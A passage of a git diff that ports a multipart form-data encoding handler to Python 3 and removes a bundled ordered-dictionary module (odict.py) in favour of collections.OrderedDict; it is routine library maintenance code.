re.finditer(b"(?i)\\s*-{20,}\\w+(\\s+Content-Disposition[^\\n]+\\s+|\\-\\-\\s*)", request.data): + part = match.group(0) + if b'\r' not in part: + request.data = request.data.replace(part, part.replace(b'\n', b"\r\n")) - request.add_data(data) return request - def multipart_encode(vars, files, boundary = None, buf = None): + def multipart_encode(self, vars, files, boundary=None, buf=None): if boundary is None: - boundary = mimetools.choose_boundary() + boundary = choose_boundary() if buf is None: - buf = '' + buf = b"" for (key, value) in vars: - buf += '--%s\r\n' % boundary - buf += 'Content-Disposition: form-data; name="%s"' % key - buf += '\r\n\r\n' + value + '\r\n' + if key is not None and value is not None: + buf += b"--%s\r\n" % getBytes(boundary) + buf += b"Content-Disposition: form-data; name=\"%s\"" % getBytes(key) + buf += b"\r\n\r\n" + getBytes(value) + b"\r\n" for (key, fd) in files: - file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len - filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1] - contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' - buf += '--%s\r\n' % boundary - buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename) - buf += 'Content-Type: %s\r\n' % contenttype - # buf += 'Content-Length: %s\r\n' % file_size + file_size = fd.len if hasattr(fd, "len") else os.fstat(fd.fileno())[stat.ST_SIZE] + filename = fd.name.split("/")[-1] if "/" in fd.name else fd.name.split("\\")[-1] + try: + contenttype = 
mimetypes.guess_type(filename)[0] or b"application/octet-stream" + except: + # Reference: http://bugs.python.org/issue9291 + contenttype = b"application/octet-stream" + buf += b"--%s\r\n" % getBytes(boundary) + buf += b"Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n" % (getBytes(key), getBytes(filename)) + buf += b"Content-Type: %s\r\n" % getBytes(contenttype) + # buf += b"Content-Length: %s\r\n" % file_size fd.seek(0) - buf = str(buf) - buf += '\r\n%s\r\n' % fd.read() + buf += b"\r\n%s\r\n" % fd.read() - buf += '--%s--\r\n\r\n' % boundary + buf += b"--%s--\r\n\r\n" % getBytes(boundary) + buf = getBytes(buf) return boundary, buf - multipart_encode = Callable(multipart_encode) - https_request = http_request diff --git a/thirdparty/odict/__init__.py b/thirdparty/odict/__init__.py index 1143598a32c..8571776ae42 100644 --- a/thirdparty/odict/__init__.py +++ b/thirdparty/odict/__init__.py @@ -1,26 +1,8 @@ #!/usr/bin/env python -# -# The BSD License -# -# Copyright 2003-2008 Nicola Larosa, Michael Foord -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -# THE SOFTWARE. -# -pass +import sys + +if sys.version_info[:2] >= (2, 7): + from collections import OrderedDict +else: + from ordereddict import OrderedDict diff --git a/thirdparty/odict/odict.py b/thirdparty/odict/odict.py deleted file mode 100644 index 9a712b048a2..00000000000 --- a/thirdparty/odict/odict.py +++ /dev/null @@ -1,1402 +0,0 @@ -# odict.py -# An Ordered Dictionary object -# Copyright (C) 2005 Nicola Larosa, Michael Foord -# E-mail: nico AT tekNico DOT net, fuzzyman AT voidspace DOT org DOT uk - -# This software is licensed under the terms of the BSD license. -# http://www.voidspace.org.uk/python/license.shtml -# Basically you're free to copy, modify, distribute and relicense it, -# So long as you keep a copy of the license with it. - -# Documentation at http://www.voidspace.org.uk/python/odict.html -# For information about bugfixes, updates and support, please join the -# Pythonutils mailing list: -# http://groups.google.com/group/pythonutils/ -# Comments, suggestions and bug reports welcome. 
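The MultipartPostHandler above kicks in whenever the request data is a dict: plain values are url-encoded, while anything file-like becomes a multipart/form-data part with a generated boundary and CRLF line endings. A hedged usage sketch (field names and URL are made up; within sqlmap the handler is wired up by the request machinery rather than called directly like this):

    from thirdparty.multipart.multipartpost import MultipartPostHandler
    from thirdparty.six.moves import urllib as _urllib

    opener = _urllib.request.build_opener(MultipartPostHandler)

    params = {
        "description": "sample upload",          # plain field -> form-data part
        "file": open("/tmp/sample.txt", "rb"),   # file-like -> part with filename/Content-Type
    }
    response = opener.open("http://www.example.com/upload", params)
    print(response.code)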
- -"""A dict that keeps keys in insertion order""" -from __future__ import generators - -__author__ = ('Nicola Larosa ,' - 'Michael Foord ') - -__docformat__ = "restructuredtext en" - -__version__ = '0.2.2' - -__all__ = ['OrderedDict', 'SequenceOrderedDict'] - -import sys -INTP_VER = sys.version_info[:2] -if INTP_VER < (2, 2): - raise RuntimeError("Python v.2.2 or later required") - -import types, warnings - -class _OrderedDict(dict): - """ - A class of dictionary that keeps the insertion order of keys. - - All appropriate methods return keys, items, or values in an ordered way. - - All normal dictionary methods are available. Update and comparison is - restricted to other OrderedDict objects. - - Various sequence methods are available, including the ability to explicitly - mutate the key ordering. - - __contains__ tests: - - >>> d = OrderedDict(((1, 3),)) - >>> 1 in d - 1 - >>> 4 in d - 0 - - __getitem__ tests: - - >>> OrderedDict(((1, 3), (3, 2), (2, 1)))[2] - 1 - >>> OrderedDict(((1, 3), (3, 2), (2, 1)))[4] - Traceback (most recent call last): - KeyError: 4 - - __len__ tests: - - >>> len(OrderedDict()) - 0 - >>> len(OrderedDict(((1, 3), (3, 2), (2, 1)))) - 3 - - get tests: - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.get(1) - 3 - >>> d.get(4) is None - 1 - >>> d.get(4, 5) - 5 - >>> d - OrderedDict([(1, 3), (3, 2), (2, 1)]) - - has_key tests: - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.has_key(1) - 1 - >>> d.has_key(4) - 0 - """ - - def __init__(self, init_val=(), strict=False): - """ - Create a new ordered dictionary. Cannot init from a normal dict, - nor from kwargs, since items order is undefined in those cases. - - If the ``strict`` keyword argument is ``True`` (``False`` is the - default) then when doing slice assignment - the ``OrderedDict`` you are - assigning from *must not* contain any keys in the remaining dict. - - >>> OrderedDict() - OrderedDict([]) - >>> OrderedDict({1: 1}) - Traceback (most recent call last): - TypeError: undefined order, cannot get items from dict - >>> OrderedDict({1: 1}.items()) - OrderedDict([(1, 1)]) - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d - OrderedDict([(1, 3), (3, 2), (2, 1)]) - >>> OrderedDict(d) - OrderedDict([(1, 3), (3, 2), (2, 1)]) - """ - self.strict = strict - dict.__init__(self) - if isinstance(init_val, OrderedDict): - self._sequence = init_val.keys() - dict.update(self, init_val) - elif isinstance(init_val, dict): - # we lose compatibility with other ordered dict types this way - raise TypeError('undefined order, cannot get items from dict') - else: - self._sequence = [] - self.update(init_val) - -### Special methods ### - - def __delitem__(self, key): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> del d[3] - >>> d - OrderedDict([(1, 3), (2, 1)]) - >>> del d[3] - Traceback (most recent call last): - KeyError: 3 - >>> d[3] = 2 - >>> d - OrderedDict([(1, 3), (2, 1), (3, 2)]) - >>> del d[0:1] - >>> d - OrderedDict([(2, 1), (3, 2)]) - """ - if isinstance(key, types.SliceType): - # FIXME: efficiency? 
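The removal of the bundled odict.py pairs with the new thirdparty/odict/__init__.py above, which now simply re-exports collections.OrderedDict (or the ordereddict backport on interpreters older than 2.7). For the insertion-order behaviour that the doctests of the removed module exercise, the standard class is a direct substitute; a quick sketch:

    from thirdparty.odict import OrderedDict

    d = OrderedDict()
    d["a"] = 1
    d["b"] = 2
    d["c"] = 3

    print(list(d.keys()))   # ['a', 'b', 'c'] - insertion order preserved
    print(d.popitem())      # ('c', 3) - note: takes last=True/False,
                            # not an index like the removed popitem(i)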
- keys = self._sequence[key] - for entry in keys: - dict.__delitem__(self, entry) - del self._sequence[key] - else: - # do the dict.__delitem__ *first* as it raises - # the more appropriate error - dict.__delitem__(self, key) - self._sequence.remove(key) - - def __eq__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d == OrderedDict(d) - True - >>> d == OrderedDict(((1, 3), (2, 1), (3, 2))) - False - >>> d == OrderedDict(((1, 0), (3, 2), (2, 1))) - False - >>> d == OrderedDict(((0, 3), (3, 2), (2, 1))) - False - >>> d == dict(d) - False - >>> d == False - False - """ - if isinstance(other, OrderedDict): - # FIXME: efficiency? - # Generate both item lists for each compare - return (self.items() == other.items()) - else: - return False - - def __lt__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) - >>> c < d - True - >>> d < c - False - >>> d < dict(c) - Traceback (most recent call last): - TypeError: Can only compare with other OrderedDicts - """ - if not isinstance(other, OrderedDict): - raise TypeError('Can only compare with other OrderedDicts') - # FIXME: efficiency? - # Generate both item lists for each compare - return (self.items() < other.items()) - - def __le__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) - >>> e = OrderedDict(d) - >>> c <= d - True - >>> d <= c - False - >>> d <= dict(c) - Traceback (most recent call last): - TypeError: Can only compare with other OrderedDicts - >>> d <= e - True - """ - if not isinstance(other, OrderedDict): - raise TypeError('Can only compare with other OrderedDicts') - # FIXME: efficiency? - # Generate both item lists for each compare - return (self.items() <= other.items()) - - def __ne__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d != OrderedDict(d) - False - >>> d != OrderedDict(((1, 3), (2, 1), (3, 2))) - True - >>> d != OrderedDict(((1, 0), (3, 2), (2, 1))) - True - >>> d == OrderedDict(((0, 3), (3, 2), (2, 1))) - False - >>> d != dict(d) - True - >>> d != False - True - """ - if isinstance(other, OrderedDict): - # FIXME: efficiency? - # Generate both item lists for each compare - return not (self.items() == other.items()) - else: - return True - - def __gt__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) - >>> d > c - True - >>> c > d - False - >>> d > dict(c) - Traceback (most recent call last): - TypeError: Can only compare with other OrderedDicts - """ - if not isinstance(other, OrderedDict): - raise TypeError('Can only compare with other OrderedDicts') - # FIXME: efficiency? - # Generate both item lists for each compare - return (self.items() > other.items()) - - def __ge__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) - >>> e = OrderedDict(d) - >>> c >= d - False - >>> d >= c - True - >>> d >= dict(c) - Traceback (most recent call last): - TypeError: Can only compare with other OrderedDicts - >>> e >= d - True - """ - if not isinstance(other, OrderedDict): - raise TypeError('Can only compare with other OrderedDicts') - # FIXME: efficiency? 
- # Generate both item lists for each compare - return (self.items() >= other.items()) - - def __repr__(self): - """ - Used for __repr__ and __str__ - - >>> r1 = repr(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f')))) - >>> r1 - "OrderedDict([('a', 'b'), ('c', 'd'), ('e', 'f')])" - >>> r2 = repr(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd')))) - >>> r2 - "OrderedDict([('a', 'b'), ('e', 'f'), ('c', 'd')])" - >>> r1 == str(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f')))) - True - >>> r2 == str(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd')))) - True - """ - return '%s([%s])' % (self.__class__.__name__, ', '.join( - ['(%r, %r)' % (key, self[key]) for key in self._sequence])) - - def __setitem__(self, key, val): - """ - Allows slice assignment, so long as the slice is an OrderedDict - >>> d = OrderedDict() - >>> d['a'] = 'b' - >>> d['b'] = 'a' - >>> d[3] = 12 - >>> d - OrderedDict([('a', 'b'), ('b', 'a'), (3, 12)]) - >>> d[:] = OrderedDict(((1, 2), (2, 3), (3, 4))) - >>> d - OrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d[::2] = OrderedDict(((7, 8), (9, 10))) - >>> d - OrderedDict([(7, 8), (2, 3), (9, 10)]) - >>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4))) - >>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8))) - >>> d - OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)]) - >>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4)), strict=True) - >>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8))) - >>> d - OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)]) - - >>> a = OrderedDict(((0, 1), (1, 2), (2, 3)), strict=True) - >>> a[3] = 4 - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4), (4, 5)]) - Traceback (most recent call last): - ValueError: slice assignment must be from unique keys - >>> a = OrderedDict(((0, 1), (1, 2), (2, 3))) - >>> a[3] = 4 - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[::-1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a - OrderedDict([(3, 4), (2, 3), (1, 2), (0, 1)]) - - >>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> d[:1] = 3 - Traceback (most recent call last): - TypeError: slice assignment requires an OrderedDict - - >>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> d[:1] = OrderedDict([(9, 8)]) - >>> d - OrderedDict([(9, 8), (1, 2), (2, 3), (3, 4)]) - """ - if isinstance(key, types.SliceType): - if not isinstance(val, OrderedDict): - # FIXME: allow a list of tuples? - raise TypeError('slice assignment requires an OrderedDict') - keys = self._sequence[key] - # NOTE: Could use ``range(*key.indices(len(self._sequence)))`` - indexes = range(len(self._sequence))[key] - if key.step is None: - # NOTE: new slice may not be the same size as the one being - # overwritten ! - # NOTE: What is the algorithm for an impossible slice? - # e.g. d[5:3] - pos = key.start or 0 - del self[key] - newkeys = val.keys() - for k in newkeys: - if k in self: - if self.strict: - raise ValueError('slice assignment must be from ' - 'unique keys') - else: - # NOTE: This removes duplicate keys *first* - # so start position might have changed? 
- del self[k] - self._sequence = (self._sequence[:pos] + newkeys + - self._sequence[pos:]) - dict.update(self, val) - else: - # extended slice - length of new slice must be the same - # as the one being replaced - if len(keys) != len(val): - raise ValueError('attempt to assign sequence of size %s ' - 'to extended slice of size %s' % (len(val), len(keys))) - # FIXME: efficiency? - del self[key] - item_list = zip(indexes, val.items()) - # smallest indexes first - higher indexes not guaranteed to - # exist - item_list.sort() - for pos, (newkey, newval) in item_list: - if self.strict and newkey in self: - raise ValueError('slice assignment must be from unique' - ' keys') - self.insert(pos, newkey, newval) - else: - if key not in self: - self._sequence.append(key) - dict.__setitem__(self, key, val) - - def __getitem__(self, key): - """ - Allows slicing. Returns an OrderedDict if you slice. - >>> b = OrderedDict([(7, 0), (6, 1), (5, 2), (4, 3), (3, 4), (2, 5), (1, 6)]) - >>> b[::-1] - OrderedDict([(1, 6), (2, 5), (3, 4), (4, 3), (5, 2), (6, 1), (7, 0)]) - >>> b[2:5] - OrderedDict([(5, 2), (4, 3), (3, 4)]) - >>> type(b[2:4]) - - """ - if isinstance(key, types.SliceType): - # FIXME: does this raise the error we want? - keys = self._sequence[key] - # FIXME: efficiency? - return OrderedDict([(entry, self[entry]) for entry in keys]) - else: - return dict.__getitem__(self, key) - - __str__ = __repr__ - - def __setattr__(self, name, value): - """ - Implemented so that accesses to ``sequence`` raise a warning and are - diverted to the new ``setkeys`` method. - """ - if name == 'sequence': - warnings.warn('Use of the sequence attribute is deprecated.' - ' Use the keys method instead.', DeprecationWarning) - # NOTE: doesn't return anything - self.setkeys(value) - else: - # FIXME: do we want to allow arbitrary setting of attributes? - # Or do we want to manage it? - object.__setattr__(self, name, value) - - def __getattr__(self, name): - """ - Implemented so that access to ``sequence`` raises a warning. - - >>> d = OrderedDict() - >>> d.sequence - [] - """ - if name == 'sequence': - warnings.warn('Use of the sequence attribute is deprecated.' - ' Use the keys method instead.', DeprecationWarning) - # NOTE: Still (currently) returns a direct reference. Need to - # because code that uses sequence will expect to be able to - # mutate it in place. - return self._sequence - else: - # raise the appropriate error - raise AttributeError("OrderedDict has no '%s' attribute" % name) - - def __deepcopy__(self, memo): - """ - To allow deepcopy to work with OrderedDict. - - >>> from copy import deepcopy - >>> a = OrderedDict([(1, 1), (2, 2), (3, 3)]) - >>> a['test'] = {} - >>> b = deepcopy(a) - >>> b == a - True - >>> b is a - False - >>> a['test'] is b['test'] - False - """ - from copy import deepcopy - return self.__class__(deepcopy(self.items(), memo), self.strict) - - -### Read-only methods ### - - def copy(self): - """ - >>> OrderedDict(((1, 3), (3, 2), (2, 1))).copy() - OrderedDict([(1, 3), (3, 2), (2, 1)]) - """ - return OrderedDict(self) - - def items(self): - """ - ``items`` returns a list of tuples representing all the - ``(key, value)`` pairs in the dictionary. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.items() - [(1, 3), (3, 2), (2, 1)] - >>> d.clear() - >>> d.items() - [] - """ - return zip(self._sequence, self.values()) - - def keys(self): - """ - Return a list of keys in the ``OrderedDict``. 
- - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.keys() - [1, 3, 2] - """ - return self._sequence[:] - - def values(self, values=None): - """ - Return a list of all the values in the OrderedDict. - - Optionally you can pass in a list of values, which will replace the - current list. The value list must be the same len as the OrderedDict. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.values() - [3, 2, 1] - """ - return [self[key] for key in self._sequence] - - def iteritems(self): - """ - >>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iteritems() - >>> ii.next() - (1, 3) - >>> ii.next() - (3, 2) - >>> ii.next() - (2, 1) - >>> ii.next() - Traceback (most recent call last): - StopIteration - """ - def make_iter(self=self): - keys = self.iterkeys() - while True: - key = keys.next() - yield (key, self[key]) - return make_iter() - - def iterkeys(self): - """ - >>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iterkeys() - >>> ii.next() - 1 - >>> ii.next() - 3 - >>> ii.next() - 2 - >>> ii.next() - Traceback (most recent call last): - StopIteration - """ - return iter(self._sequence) - - __iter__ = iterkeys - - def itervalues(self): - """ - >>> iv = OrderedDict(((1, 3), (3, 2), (2, 1))).itervalues() - >>> iv.next() - 3 - >>> iv.next() - 2 - >>> iv.next() - 1 - >>> iv.next() - Traceback (most recent call last): - StopIteration - """ - def make_iter(self=self): - keys = self.iterkeys() - while True: - yield self[keys.next()] - return make_iter() - -### Read-write methods ### - - def clear(self): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.clear() - >>> d - OrderedDict([]) - """ - dict.clear(self) - self._sequence = [] - - def pop(self, key, *args): - """ - No dict.pop in Python 2.2, gotta reimplement it - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.pop(3) - 2 - >>> d - OrderedDict([(1, 3), (2, 1)]) - >>> d.pop(4) - Traceback (most recent call last): - KeyError: 4 - >>> d.pop(4, 0) - 0 - >>> d.pop(4, 0, 1) - Traceback (most recent call last): - TypeError: pop expected at most 2 arguments, got 3 - """ - if len(args) > 1: - raise TypeError, ('pop expected at most 2 arguments, got %s' % - (len(args) + 1)) - if key in self: - val = self[key] - del self[key] - else: - try: - val = args[0] - except IndexError: - raise KeyError(key) - return val - - def popitem(self, i=-1): - """ - Delete and return an item specified by index, not a random one as in - dict. The index is -1 by default (the last item). 
- - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.popitem() - (2, 1) - >>> d - OrderedDict([(1, 3), (3, 2)]) - >>> d.popitem(0) - (1, 3) - >>> OrderedDict().popitem() - Traceback (most recent call last): - KeyError: 'popitem(): dictionary is empty' - >>> d.popitem(2) - Traceback (most recent call last): - IndexError: popitem(): index 2 not valid - """ - if not self._sequence: - raise KeyError('popitem(): dictionary is empty') - try: - key = self._sequence[i] - except IndexError: - raise IndexError('popitem(): index %s not valid' % i) - return (key, self.pop(key)) - - def setdefault(self, key, defval = None): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.setdefault(1) - 3 - >>> d.setdefault(4) is None - True - >>> d - OrderedDict([(1, 3), (3, 2), (2, 1), (4, None)]) - >>> d.setdefault(5, 0) - 0 - >>> d - OrderedDict([(1, 3), (3, 2), (2, 1), (4, None), (5, 0)]) - """ - if key in self: - return self[key] - else: - self[key] = defval - return defval - - def update(self, from_od): - """ - Update from another OrderedDict or sequence of (key, value) pairs - - >>> d = OrderedDict(((1, 0), (0, 1))) - >>> d.update(OrderedDict(((1, 3), (3, 2), (2, 1)))) - >>> d - OrderedDict([(1, 3), (0, 1), (3, 2), (2, 1)]) - >>> d.update({4: 4}) - Traceback (most recent call last): - TypeError: undefined order, cannot get items from dict - >>> d.update((4, 4)) - Traceback (most recent call last): - TypeError: cannot convert dictionary update sequence element "4" to a 2-item sequence - """ - if isinstance(from_od, OrderedDict): - for key, val in from_od.items(): - self[key] = val - elif isinstance(from_od, dict): - # we lose compatibility with other ordered dict types this way - raise TypeError('undefined order, cannot get items from dict') - else: - # FIXME: efficiency? - # sequence of 2-item sequences, or error - for item in from_od: - try: - key, val = item - except TypeError: - raise TypeError('cannot convert dictionary update' - ' sequence element "%s" to a 2-item sequence' % item) - self[key] = val - - def rename(self, old_key, new_key): - """ - Rename the key for a given value, without modifying sequence order. - - For the case where new_key already exists this raise an exception, - since if new_key exists, it is ambiguous as to what happens to the - associated values, and the position of new_key in the sequence. - - >>> od = OrderedDict() - >>> od['a'] = 1 - >>> od['b'] = 2 - >>> od.items() - [('a', 1), ('b', 2)] - >>> od.rename('b', 'c') - >>> od.items() - [('a', 1), ('c', 2)] - >>> od.rename('c', 'a') - Traceback (most recent call last): - ValueError: New key already exists: 'a' - >>> od.rename('d', 'b') - Traceback (most recent call last): - KeyError: 'd' - """ - if new_key == old_key: - # no-op - return - if new_key in self: - raise ValueError("New key already exists: %r" % new_key) - # rename sequence entry - value = self[old_key] - old_idx = self._sequence.index(old_key) - self._sequence[old_idx] = new_key - # rename internal dict entry - dict.__delitem__(self, old_key) - dict.__setitem__(self, new_key, value) - - def setitems(self, items): - """ - This method allows you to set the items in the dict. - - It takes a list of tuples - of the same sort returned by the ``items`` - method. 
- - >>> d = OrderedDict() - >>> d.setitems(((3, 1), (2, 3), (1, 2))) - >>> d - OrderedDict([(3, 1), (2, 3), (1, 2)]) - """ - self.clear() - # FIXME: this allows you to pass in an OrderedDict as well :-) - self.update(items) - - def setkeys(self, keys): - """ - ``setkeys`` all ows you to pass in a new list of keys which will - replace the current set. This must contain the same set of keys, but - need not be in the same order. - - If you pass in new keys that don't match, a ``KeyError`` will be - raised. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.keys() - [1, 3, 2] - >>> d.setkeys((1, 2, 3)) - >>> d - OrderedDict([(1, 3), (2, 1), (3, 2)]) - >>> d.setkeys(['a', 'b', 'c']) - Traceback (most recent call last): - KeyError: 'Keylist is not the same as current keylist.' - """ - # FIXME: Efficiency? (use set for Python 2.4 :-) - # NOTE: list(keys) rather than keys[:] because keys[:] returns - # a tuple, if keys is a tuple. - kcopy = list(keys) - kcopy.sort() - self._sequence.sort() - if kcopy != self._sequence: - raise KeyError('Keylist is not the same as current keylist.') - # NOTE: This makes the _sequence attribute a new object, instead - # of changing it in place. - # FIXME: efficiency? - self._sequence = list(keys) - - def setvalues(self, values): - """ - You can pass in a list of values, which will replace the - current list. The value list must be the same len as the OrderedDict. - - (Or a ``ValueError`` is raised.) - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.setvalues((1, 2, 3)) - >>> d - OrderedDict([(1, 1), (3, 2), (2, 3)]) - >>> d.setvalues([6]) - Traceback (most recent call last): - ValueError: Value list is not the same length as the OrderedDict. - """ - if len(values) != len(self): - # FIXME: correct error to raise? - raise ValueError('Value list is not the same length as the ' - 'OrderedDict.') - self.update(zip(self, values)) - -### Sequence Methods ### - - def index(self, key): - """ - Return the position of the specified key in the OrderedDict. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.index(3) - 1 - >>> d.index(4) - Traceback (most recent call last): - ValueError: list.index(x): x not in list - """ - return self._sequence.index(key) - - def insert(self, index, key, value): - """ - Takes ``index``, ``key``, and ``value`` as arguments. - - Sets ``key`` to ``value``, so that ``key`` is at position ``index`` in - the OrderedDict. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.insert(0, 4, 0) - >>> d - OrderedDict([(4, 0), (1, 3), (3, 2), (2, 1)]) - >>> d.insert(0, 2, 1) - >>> d - OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2)]) - >>> d.insert(8, 8, 1) - >>> d - OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2), (8, 1)]) - """ - if key in self: - # FIXME: efficiency? - del self[key] - self._sequence.insert(index, key) - dict.__setitem__(self, key, value) - - def reverse(self): - """ - Reverse the order of the OrderedDict. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.reverse() - >>> d - OrderedDict([(2, 1), (3, 2), (1, 3)]) - """ - self._sequence.reverse() - - def sort(self, *args, **kwargs): - """ - Sort the key order in the OrderedDict. - - This method takes the same arguments as the ``list.sort`` method on - your version of Python. 
- - >>> d = OrderedDict(((4, 1), (2, 2), (3, 3), (1, 4))) - >>> d.sort() - >>> d - OrderedDict([(1, 4), (2, 2), (3, 3), (4, 1)]) - """ - self._sequence.sort(*args, **kwargs) - -if INTP_VER >= (2, 7): - from collections import OrderedDict -else: - OrderedDict = _OrderedDict - -class Keys(object): - # FIXME: should this object be a subclass of list? - """ - Custom object for accessing the keys of an OrderedDict. - - Can be called like the normal ``OrderedDict.keys`` method, but also - supports indexing and sequence methods. - """ - - def __init__(self, main): - self._main = main - - def __call__(self): - """Pretend to be the keys method.""" - return self._main._keys() - - def __getitem__(self, index): - """Fetch the key at position i.""" - # NOTE: this automatically supports slicing :-) - return self._main._sequence[index] - - def __setitem__(self, index, name): - """ - You cannot assign to keys, but you can do slice assignment to re-order - them. - - You can only do slice assignment if the new set of keys is a reordering - of the original set. - """ - if isinstance(index, types.SliceType): - # FIXME: efficiency? - # check length is the same - indexes = range(len(self._main._sequence))[index] - if len(indexes) != len(name): - raise ValueError('attempt to assign sequence of size %s ' - 'to slice of size %s' % (len(name), len(indexes))) - # check they are the same keys - # FIXME: Use set - old_keys = self._main._sequence[index] - new_keys = list(name) - old_keys.sort() - new_keys.sort() - if old_keys != new_keys: - raise KeyError('Keylist is not the same as current keylist.') - orig_vals = [self._main[k] for k in name] - del self._main[index] - vals = zip(indexes, name, orig_vals) - vals.sort() - for i, k, v in vals: - if self._main.strict and k in self._main: - raise ValueError('slice assignment must be from ' - 'unique keys') - self._main.insert(i, k, v) - else: - raise ValueError('Cannot assign to keys') - - ### following methods pinched from UserList and adapted ### - def __repr__(self): return repr(self._main._sequence) - - # FIXME: do we need to check if we are comparing with another ``Keys`` - # object? (like the __cast method of UserList) - def __lt__(self, other): return self._main._sequence < other - def __le__(self, other): return self._main._sequence <= other - def __eq__(self, other): return self._main._sequence == other - def __ne__(self, other): return self._main._sequence != other - def __gt__(self, other): return self._main._sequence > other - def __ge__(self, other): return self._main._sequence >= other - # FIXME: do we need __cmp__ as well as rich comparisons? 
- def __cmp__(self, other): return cmp(self._main._sequence, other) - - def __contains__(self, item): return item in self._main._sequence - def __len__(self): return len(self._main._sequence) - def __iter__(self): return self._main.iterkeys() - def count(self, item): return self._main._sequence.count(item) - def index(self, item, *args): return self._main._sequence.index(item, *args) - def reverse(self): self._main._sequence.reverse() - def sort(self, *args, **kwds): self._main._sequence.sort(*args, **kwds) - def __mul__(self, n): return self._main._sequence*n - __rmul__ = __mul__ - def __add__(self, other): return self._main._sequence + other - def __radd__(self, other): return other + self._main._sequence - - ## following methods not implemented for keys ## - def __delitem__(self, i): raise TypeError('Can\'t delete items from keys') - def __iadd__(self, other): raise TypeError('Can\'t add in place to keys') - def __imul__(self, n): raise TypeError('Can\'t multiply keys in place') - def append(self, item): raise TypeError('Can\'t append items to keys') - def insert(self, i, item): raise TypeError('Can\'t insert items into keys') - def pop(self, i=-1): raise TypeError('Can\'t pop items from keys') - def remove(self, item): raise TypeError('Can\'t remove items from keys') - def extend(self, other): raise TypeError('Can\'t extend keys') - -class Items(object): - """ - Custom object for accessing the items of an OrderedDict. - - Can be called like the normal 